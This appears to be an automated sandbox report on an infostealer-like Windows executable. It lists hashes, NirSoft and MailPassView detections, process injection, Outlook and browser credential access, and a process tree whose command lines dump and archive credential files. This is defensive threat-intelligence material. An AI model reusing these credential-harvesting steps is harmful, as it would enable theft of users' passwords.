Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
108s -
max time network
140s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system -
submitted
07/09/2024, 07:48
Static task
static1
Behavioral task
behavioral1
Sample
d16ce7cf123a64124e62853b6334fb85_JaffaCakes118.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
d16ce7cf123a64124e62853b6334fb85_JaffaCakes118.exe
Resource
win10v2004-20240802-en
General
-
Target
d16ce7cf123a64124e62853b6334fb85_JaffaCakes118.exe
-
Size
1.0MB
-
MD5
d16ce7cf123a64124e62853b6334fb85
-
SHA1
dffee691c7c1010c8a410057ebdce003631055bc
-
SHA256
e58c7afbf68aa6364b320af12e3fb65df7c53b534f30c5d1de60c63bfe4fc37e
-
SHA512
1f29aa8b81eaf72f4f05e37c200d1be4acb1c3d050951e0783b6e7ff8de17983b2bf1338107bcf03766f353e40c809a7dca90abc403e2af5dd1a2f99b2bfdb1b
-
SSDEEP
24576:W6Fv2eEgqRryI/iN3czSX+2RSSeqSE6EbwWFxI8yA/q24io3:lF+JJyyP+2McGPn/U
Malware Config
Signatures
-
Detected Nirsoft tools 16 IoCs
Free utilities often used by attackers which can steal passwords, product keys, etc.
resource yara_rule behavioral2/memory/2376-33-0x0000000000400000-0x0000000000416000-memory.dmp Nirsoft behavioral2/memory/2948-39-0x0000000000400000-0x0000000000415000-memory.dmp Nirsoft behavioral2/memory/2948-38-0x0000000000400000-0x0000000000415000-memory.dmp Nirsoft behavioral2/memory/2376-32-0x0000000000400000-0x0000000000416000-memory.dmp Nirsoft behavioral2/memory/4244-27-0x0000000000400000-0x0000000000418000-memory.dmp Nirsoft behavioral2/memory/4244-26-0x0000000000400000-0x0000000000418000-memory.dmp Nirsoft behavioral2/memory/3964-16-0x0000000000400000-0x0000000000431000-memory.dmp Nirsoft behavioral2/memory/3964-15-0x0000000000400000-0x0000000000431000-memory.dmp Nirsoft behavioral2/memory/4460-13-0x0000000000400000-0x000000000041D000-memory.dmp Nirsoft behavioral2/memory/4460-12-0x0000000000400000-0x000000000041D000-memory.dmp Nirsoft behavioral2/memory/4200-11-0x0000000000400000-0x000000000043D000-memory.dmp Nirsoft behavioral2/memory/4200-10-0x0000000000400000-0x000000000043D000-memory.dmp Nirsoft behavioral2/memory/3892-19-0x0000000000400000-0x000000000041B000-memory.dmp Nirsoft behavioral2/memory/3892-18-0x0000000000400000-0x000000000041B000-memory.dmp Nirsoft behavioral2/memory/2928-42-0x0000000000400000-0x0000000000425000-memory.dmp Nirsoft behavioral2/memory/2928-41-0x0000000000400000-0x0000000000425000-memory.dmp Nirsoft -
NirSoft MailPassView 2 IoCs
Password recovery tool for various email clients
resource yara_rule behavioral2/memory/4460-13-0x0000000000400000-0x000000000041D000-memory.dmp MailPassView behavioral2/memory/4460-12-0x0000000000400000-0x000000000041D000-memory.dmp MailPassView -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\Control Panel\International\Geo\Nation d16ce7cf123a64124e62853b6334fb85_JaffaCakes118.exe Key value queried \REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\Control Panel\International\Geo\Nation d16ce7cf123a64124e62853b6334fb85_JaffaCakes118.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
resource yara_rule behavioral2/memory/4200-0-0x0000000000400000-0x000000000043D000-memory.dmp upx behavioral2/memory/3892-1-0x0000000000400000-0x000000000041B000-memory.dmp upx behavioral2/memory/3964-6-0x0000000000400000-0x0000000000431000-memory.dmp upx behavioral2/memory/4460-4-0x0000000000400000-0x000000000041D000-memory.dmp upx behavioral2/memory/2928-20-0x0000000000400000-0x0000000000425000-memory.dmp upx behavioral2/memory/4244-25-0x0000000000400000-0x0000000000418000-memory.dmp upx behavioral2/memory/2376-33-0x0000000000400000-0x0000000000416000-memory.dmp upx behavioral2/memory/2948-39-0x0000000000400000-0x0000000000415000-memory.dmp upx behavioral2/memory/2948-38-0x0000000000400000-0x0000000000415000-memory.dmp upx behavioral2/memory/2948-37-0x0000000000400000-0x0000000000415000-memory.dmp upx behavioral2/memory/2948-35-0x0000000000400000-0x0000000000415000-memory.dmp upx behavioral2/memory/2376-32-0x0000000000400000-0x0000000000416000-memory.dmp upx behavioral2/memory/2376-31-0x0000000000400000-0x0000000000416000-memory.dmp upx behavioral2/memory/2376-29-0x0000000000400000-0x0000000000416000-memory.dmp upx behavioral2/memory/4244-27-0x0000000000400000-0x0000000000418000-memory.dmp upx behavioral2/memory/4244-26-0x0000000000400000-0x0000000000418000-memory.dmp upx behavioral2/memory/2928-24-0x0000000000400000-0x0000000000425000-memory.dmp upx behavioral2/memory/4244-22-0x0000000000400000-0x0000000000418000-memory.dmp upx behavioral2/memory/3892-17-0x0000000000400000-0x000000000041B000-memory.dmp upx behavioral2/memory/3964-16-0x0000000000400000-0x0000000000431000-memory.dmp upx behavioral2/memory/3964-14-0x0000000000400000-0x0000000000431000-memory.dmp upx behavioral2/memory/3964-15-0x0000000000400000-0x0000000000431000-memory.dmp upx behavioral2/memory/4460-13-0x0000000000400000-0x000000000041D000-memory.dmp upx behavioral2/memory/4460-12-0x0000000000400000-0x000000000041D000-memory.dmp upx behavioral2/memory/4200-11-0x0000000000400000-0x000000000043D000-memory.dmp upx behavioral2/memory/4200-10-0x0000000000400000-0x000000000043D000-memory.dmp upx behavioral2/memory/4460-9-0x0000000000400000-0x000000000041D000-memory.dmp upx behavioral2/memory/3892-19-0x0000000000400000-0x000000000041B000-memory.dmp upx behavioral2/memory/3892-18-0x0000000000400000-0x000000000041B000-memory.dmp upx behavioral2/memory/4200-7-0x0000000000400000-0x000000000043D000-memory.dmp upx behavioral2/memory/2928-42-0x0000000000400000-0x0000000000425000-memory.dmp upx behavioral2/memory/2928-41-0x0000000000400000-0x0000000000425000-memory.dmp upx behavioral2/memory/792-62-0x0000000000400000-0x0000000000410000-memory.dmp upx behavioral2/memory/792-65-0x0000000000400000-0x0000000000410000-memory.dmp upx behavioral2/memory/792-66-0x0000000000400000-0x0000000000410000-memory.dmp upx behavioral2/memory/792-64-0x0000000000400000-0x0000000000410000-memory.dmp upx -
Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts d16ce7cf123a64124e62853b6334fb85_JaffaCakes118.exe -
Suspicious use of SetThreadContext 10 IoCs
description pid Process procid_target PID 4224 set thread context of 4200 4224 d16ce7cf123a64124e62853b6334fb85_JaffaCakes118.exe 87 PID 4224 set thread context of 3892 4224 d16ce7cf123a64124e62853b6334fb85_JaffaCakes118.exe 88 PID 4224 set thread context of 4460 4224 d16ce7cf123a64124e62853b6334fb85_JaffaCakes118.exe 89 PID 4224 set thread context of 3964 4224 d16ce7cf123a64124e62853b6334fb85_JaffaCakes118.exe 90 PID 4224 set thread context of 2928 4224 d16ce7cf123a64124e62853b6334fb85_JaffaCakes118.exe 91 PID 4224 set thread context of 4244 4224 d16ce7cf123a64124e62853b6334fb85_JaffaCakes118.exe 92 PID 4224 set thread context of 2376 4224 d16ce7cf123a64124e62853b6334fb85_JaffaCakes118.exe 93 PID 4224 set thread context of 2948 4224 d16ce7cf123a64124e62853b6334fb85_JaffaCakes118.exe 94 PID 4224 set thread context of 3156 4224 d16ce7cf123a64124e62853b6334fb85_JaffaCakes118.exe 102 PID 4224 set thread context of 792 4224 d16ce7cf123a64124e62853b6334fb85_JaffaCakes118.exe 106 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 14 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language d16ce7cf123a64124e62853b6334fb85_JaffaCakes118.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language IEXPLORE.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language d16ce7cf123a64124e62853b6334fb85_JaffaCakes118.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language d16ce7cf123a64124e62853b6334fb85_JaffaCakes118.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language d16ce7cf123a64124e62853b6334fb85_JaffaCakes118.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language d16ce7cf123a64124e62853b6334fb85_JaffaCakes118.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language d16ce7cf123a64124e62853b6334fb85_JaffaCakes118.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language d16ce7cf123a64124e62853b6334fb85_JaffaCakes118.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language d16ce7cf123a64124e62853b6334fb85_JaffaCakes118.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language d16ce7cf123a64124e62853b6334fb85_JaffaCakes118.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language d16ce7cf123a64124e62853b6334fb85_JaffaCakes118.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language d16ce7cf123a64124e62853b6334fb85_JaffaCakes118.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\Software\Microsoft\Internet Explorer\VersionManager iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastUpdateHighDateTime = "31129850" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\FileNames iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\FileNames\en-US = "en-US.1" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\Software\Microsoft\Internet Explorer\Main iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\SOFTWARE\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\Software\Microsoft\Internet Explorer\IESettingSync IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\Software\Microsoft\Internet Explorer\Main IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateLowDateTime = "2040308672" IEXPLORE.EXE Set value (data) \REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000001bc9387f4f791b45af7c7e57591307f100000000020000000000106600000001000020000000f2e3985b818279c2356c014814f18e401a3fb550035ee5fccc6d79e5171c8f17000000000e800000000200002000000074101991ccaa80fe71941d38b762fd231f3126b581587e9b70d06a0a9cb2392e200000007f6cfe363b4172771838fc563f0d0397ca04488518db141acbeb67f6fca58bed400000009d67c4d9a44b7d34792cee372d4f6d31bf9c3984fffd611c7650f886a7c5b68d980b70f9c4af34462e14b45b3bfe80381d7f4a8aad350d11d9972c9809abf467 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastTTLLowDateTime = "1251635200" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "432460315" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\AdminActive\{A50FFC2E-6CED-11EF-BB4F-CA89CBF88D4A} = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\SOFTWARE\Microsoft\Internet Explorer\IESettingSync\SlowSettingTypesChanged = "2" IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastUpdateLowDateTime = "2038902334" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FullScreen = "no" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\Software\Microsoft\Internet Explorer\DomainSuggestion iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateHighDateTime = "31129850" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\Software\Microsoft\Internet Explorer\GPU IEXPLORE.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\SOFTWARE\Microsoft\Internet Explorer\GPU\AdapterInfo = "vendorId=\"0x10de\",deviceID=\"0x8c\",subSysID=\"0x0\",revision=\"0x0\",version=\"10.0.19041.546\"hypervisor=\"No Hypervisor (No SLAT)\"" IEXPLORE.EXE Set value (data) \REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000001bc9387f4f791b45af7c7e57591307f100000000020000000000106600000001000020000000d7d7389d88680012c2abac64e04c729202870ecc4f5028ccb882422c00a01835000000000e8000000002000020000000c81d7b630e273286c6eda3307ed3fb642ee96c9ae9b6432bf1dc7318045cadd520000000bc5f834e1cc66a7d2dbdd361aeddf3c3015b0c6f2a93a942239960ea80f601a0400000007f1d09e875f535e89e27f186f02fa76375393fa2492ec182d87a319a85198bf4dbbfb38e00533a21a510995a5c2490ec55093857811fb445cea827189e060fa9 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\FileNames\ iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateHighDateTime = "31129850" IEXPLORE.EXE Set value (data) \REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 200a607afa00db01 iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\SOFTWARE\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastTTLHighDateTime = "50" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateLowDateTime = "2038902334" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\Software\Microsoft\Internet Explorer\VersionManager IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 1036677afa00db01 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\ iexplore.exe -
Suspicious behavior: EnumeratesProcesses 4 IoCs
pid Process 4224 d16ce7cf123a64124e62853b6334fb85_JaffaCakes118.exe 4224 d16ce7cf123a64124e62853b6334fb85_JaffaCakes118.exe 2928 d16ce7cf123a64124e62853b6334fb85_JaffaCakes118.exe 2928 d16ce7cf123a64124e62853b6334fb85_JaffaCakes118.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
description pid Process Token: SeDebugPrivilege 3892 d16ce7cf123a64124e62853b6334fb85_JaffaCakes118.exe Token: SeRestorePrivilege 3892 d16ce7cf123a64124e62853b6334fb85_JaffaCakes118.exe Token: SeBackupPrivilege 3892 d16ce7cf123a64124e62853b6334fb85_JaffaCakes118.exe Token: SeDebugPrivilege 2928 d16ce7cf123a64124e62853b6334fb85_JaffaCakes118.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
pid Process 496 iexplore.exe -
Suspicious use of SetWindowsHookEx 6 IoCs
pid Process 496 iexplore.exe 496 iexplore.exe 4852 IEXPLORE.EXE 4852 IEXPLORE.EXE 4852 IEXPLORE.EXE 4852 IEXPLORE.EXE -
Suspicious use of WriteProcessMemory 61 IoCs
description pid Process procid_target PID 4224 wrote to memory of 4200 4224 d16ce7cf123a64124e62853b6334fb85_JaffaCakes118.exe 87 PID 4224 wrote to memory of 4200 4224 d16ce7cf123a64124e62853b6334fb85_JaffaCakes118.exe 87 PID 4224 wrote to memory of 4200 4224 d16ce7cf123a64124e62853b6334fb85_JaffaCakes118.exe 87 PID 4224 wrote to memory of 4200 4224 d16ce7cf123a64124e62853b6334fb85_JaffaCakes118.exe 87 PID 4224 wrote to memory of 4200 4224 d16ce7cf123a64124e62853b6334fb85_JaffaCakes118.exe 87 PID 4224 wrote to memory of 3892 4224 d16ce7cf123a64124e62853b6334fb85_JaffaCakes118.exe 88 PID 4224 wrote to memory of 3892 4224 d16ce7cf123a64124e62853b6334fb85_JaffaCakes118.exe 88 PID 4224 wrote to memory of 3892 4224 d16ce7cf123a64124e62853b6334fb85_JaffaCakes118.exe 88 PID 4224 wrote to memory of 3892 4224 d16ce7cf123a64124e62853b6334fb85_JaffaCakes118.exe 88 PID 4224 wrote to memory of 3892 4224 d16ce7cf123a64124e62853b6334fb85_JaffaCakes118.exe 88 PID 4224 wrote to memory of 4460 4224 d16ce7cf123a64124e62853b6334fb85_JaffaCakes118.exe 89 PID 4224 wrote to memory of 4460 4224 d16ce7cf123a64124e62853b6334fb85_JaffaCakes118.exe 89 PID 4224 wrote to memory of 4460 4224 d16ce7cf123a64124e62853b6334fb85_JaffaCakes118.exe 89 PID 4224 wrote to memory of 4460 4224 d16ce7cf123a64124e62853b6334fb85_JaffaCakes118.exe 89 PID 4224 wrote to memory of 4460 4224 d16ce7cf123a64124e62853b6334fb85_JaffaCakes118.exe 89 PID 4224 wrote to memory of 3964 4224 d16ce7cf123a64124e62853b6334fb85_JaffaCakes118.exe 90 PID 4224 wrote to memory of 3964 4224 d16ce7cf123a64124e62853b6334fb85_JaffaCakes118.exe 90 PID 4224 wrote to memory of 3964 4224 d16ce7cf123a64124e62853b6334fb85_JaffaCakes118.exe 90 PID 4224 wrote to memory of 3964 4224 d16ce7cf123a64124e62853b6334fb85_JaffaCakes118.exe 90 PID 4224 wrote to memory of 3964 4224 d16ce7cf123a64124e62853b6334fb85_JaffaCakes118.exe 90 PID 4224 wrote to memory of 2928 4224 d16ce7cf123a64124e62853b6334fb85_JaffaCakes118.exe 91 PID 4224 wrote to memory of 2928 4224 d16ce7cf123a64124e62853b6334fb85_JaffaCakes118.exe 91 PID 4224 wrote to memory of 2928 4224 d16ce7cf123a64124e62853b6334fb85_JaffaCakes118.exe 91 PID 4224 wrote to memory of 2928 4224 d16ce7cf123a64124e62853b6334fb85_JaffaCakes118.exe 91 PID 4224 wrote to memory of 2928 4224 d16ce7cf123a64124e62853b6334fb85_JaffaCakes118.exe 91 PID 4224 wrote to memory of 4244 4224 d16ce7cf123a64124e62853b6334fb85_JaffaCakes118.exe 92 PID 4224 wrote to memory of 4244 4224 d16ce7cf123a64124e62853b6334fb85_JaffaCakes118.exe 92 PID 4224 wrote to memory of 4244 4224 d16ce7cf123a64124e62853b6334fb85_JaffaCakes118.exe 92 PID 4224 wrote to memory of 4244 4224 d16ce7cf123a64124e62853b6334fb85_JaffaCakes118.exe 92 PID 4224 wrote to memory of 4244 4224 d16ce7cf123a64124e62853b6334fb85_JaffaCakes118.exe 92 PID 4224 wrote to memory of 2376 4224 d16ce7cf123a64124e62853b6334fb85_JaffaCakes118.exe 93 PID 4224 wrote to memory of 2376 4224 d16ce7cf123a64124e62853b6334fb85_JaffaCakes118.exe 93 PID 4224 wrote to memory of 2376 4224 d16ce7cf123a64124e62853b6334fb85_JaffaCakes118.exe 93 PID 4224 wrote to memory of 2376 4224 d16ce7cf123a64124e62853b6334fb85_JaffaCakes118.exe 93 PID 4224 wrote to memory of 2376 4224 d16ce7cf123a64124e62853b6334fb85_JaffaCakes118.exe 93 PID 4224 wrote to memory of 2948 4224 d16ce7cf123a64124e62853b6334fb85_JaffaCakes118.exe 94 PID 4224 wrote to memory of 2948 4224 d16ce7cf123a64124e62853b6334fb85_JaffaCakes118.exe 94 PID 4224 wrote to memory of 2948 4224 d16ce7cf123a64124e62853b6334fb85_JaffaCakes118.exe 94 PID 4224 wrote to memory of 2948 4224 d16ce7cf123a64124e62853b6334fb85_JaffaCakes118.exe 94 PID 4224 wrote to memory of 2948 4224 d16ce7cf123a64124e62853b6334fb85_JaffaCakes118.exe 94 PID 4224 wrote to memory of 3156 4224 d16ce7cf123a64124e62853b6334fb85_JaffaCakes118.exe 102 PID 4224 wrote to memory of 3156 4224 d16ce7cf123a64124e62853b6334fb85_JaffaCakes118.exe 102 PID 4224 wrote to memory of 3156 4224 d16ce7cf123a64124e62853b6334fb85_JaffaCakes118.exe 102 PID 4224 wrote to memory of 3156 4224 d16ce7cf123a64124e62853b6334fb85_JaffaCakes118.exe 102 PID 4224 wrote to memory of 3156 4224 d16ce7cf123a64124e62853b6334fb85_JaffaCakes118.exe 102 PID 4224 wrote to memory of 792 4224 d16ce7cf123a64124e62853b6334fb85_JaffaCakes118.exe 106 PID 4224 wrote to memory of 792 4224 d16ce7cf123a64124e62853b6334fb85_JaffaCakes118.exe 106 PID 4224 wrote to memory of 792 4224 d16ce7cf123a64124e62853b6334fb85_JaffaCakes118.exe 106 PID 4224 wrote to memory of 792 4224 d16ce7cf123a64124e62853b6334fb85_JaffaCakes118.exe 106 PID 4224 wrote to memory of 792 4224 d16ce7cf123a64124e62853b6334fb85_JaffaCakes118.exe 106 PID 4224 wrote to memory of 496 4224 d16ce7cf123a64124e62853b6334fb85_JaffaCakes118.exe 107 PID 4224 wrote to memory of 496 4224 d16ce7cf123a64124e62853b6334fb85_JaffaCakes118.exe 107 PID 496 wrote to memory of 4852 496 iexplore.exe 108 PID 496 wrote to memory of 4852 496 iexplore.exe 108 PID 496 wrote to memory of 4852 496 iexplore.exe 108 PID 792 wrote to memory of 1208 792 d16ce7cf123a64124e62853b6334fb85_JaffaCakes118.exe 109 PID 792 wrote to memory of 1208 792 d16ce7cf123a64124e62853b6334fb85_JaffaCakes118.exe 109 PID 792 wrote to memory of 1208 792 d16ce7cf123a64124e62853b6334fb85_JaffaCakes118.exe 109 PID 4224 wrote to memory of 4964 4224 d16ce7cf123a64124e62853b6334fb85_JaffaCakes118.exe 110 PID 4224 wrote to memory of 4964 4224 d16ce7cf123a64124e62853b6334fb85_JaffaCakes118.exe 110 PID 4224 wrote to memory of 4964 4224 d16ce7cf123a64124e62853b6334fb85_JaffaCakes118.exe 110
Processes
-
C:\Users\Admin\AppData\Local\Temp\d16ce7cf123a64124e62853b6334fb85_JaffaCakes118.exe"C:\Users\Admin\AppData\Local\Temp\d16ce7cf123a64124e62853b6334fb85_JaffaCakes118.exe"1⤵
- Checks computer location settings
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4224 -
C:\Users\Admin\AppData\Local\Temp\d16ce7cf123a64124e62853b6334fb85_JaffaCakes118.exe"d16ce7cf123a64124e62853b6334fb85_JaffaCakes118.exe" /stab rundll32_1.sys2⤵
- System Location Discovery: System Language Discovery
PID:4200
-
-
C:\Users\Admin\AppData\Local\Temp\d16ce7cf123a64124e62853b6334fb85_JaffaCakes118.exe"d16ce7cf123a64124e62853b6334fb85_JaffaCakes118.exe" /stab rundll32_2.sys2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:3892
-
-
C:\Users\Admin\AppData\Local\Temp\d16ce7cf123a64124e62853b6334fb85_JaffaCakes118.exe"d16ce7cf123a64124e62853b6334fb85_JaffaCakes118.exe" /stab rundll32_3.sys2⤵
- Accesses Microsoft Outlook accounts
- System Location Discovery: System Language Discovery
PID:4460
-
-
C:\Users\Admin\AppData\Local\Temp\d16ce7cf123a64124e62853b6334fb85_JaffaCakes118.exe"d16ce7cf123a64124e62853b6334fb85_JaffaCakes118.exe" /stab rundll32_4.sys2⤵
- System Location Discovery: System Language Discovery
PID:3964
-
-
C:\Users\Admin\AppData\Local\Temp\d16ce7cf123a64124e62853b6334fb85_JaffaCakes118.exe"d16ce7cf123a64124e62853b6334fb85_JaffaCakes118.exe" /stab rundll32_5.sys2⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2928
-
-
C:\Users\Admin\AppData\Local\Temp\d16ce7cf123a64124e62853b6334fb85_JaffaCakes118.exe"d16ce7cf123a64124e62853b6334fb85_JaffaCakes118.exe" /stab rundll32_7.sys2⤵
- System Location Discovery: System Language Discovery
PID:4244
-
-
C:\Users\Admin\AppData\Local\Temp\d16ce7cf123a64124e62853b6334fb85_JaffaCakes118.exe"d16ce7cf123a64124e62853b6334fb85_JaffaCakes118.exe" /stab rundll32_8.sys2⤵
- System Location Discovery: System Language Discovery
PID:2376
-
-
C:\Users\Admin\AppData\Local\Temp\d16ce7cf123a64124e62853b6334fb85_JaffaCakes118.exe"d16ce7cf123a64124e62853b6334fb85_JaffaCakes118.exe" /stab rundll32_9.sys2⤵
- System Location Discovery: System Language Discovery
PID:2948
-
-
C:\Users\Admin\AppData\Local\Temp\d16ce7cf123a64124e62853b6334fb85_JaffaCakes118.exe"d16ce7cf123a64124e62853b6334fb85_JaffaCakes118.exe" a -ppEsTs}eLdS54 rundll32.dat rundll32_*2⤵
- System Location Discovery: System Language Discovery
PID:3156
-
-
C:\Users\Admin\AppData\Local\Temp\d16ce7cf123a64124e62853b6334fb85_JaffaCakes118.exe"C:\Users\Admin\AppData\Local\Temp\d16ce7cf123a64124e62853b6334fb85_JaffaCakes118.exe"2⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:792 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\7EA.tmp\ren.bat" "3⤵
- System Location Discovery: System Language Discovery
PID:1208
-
-
-
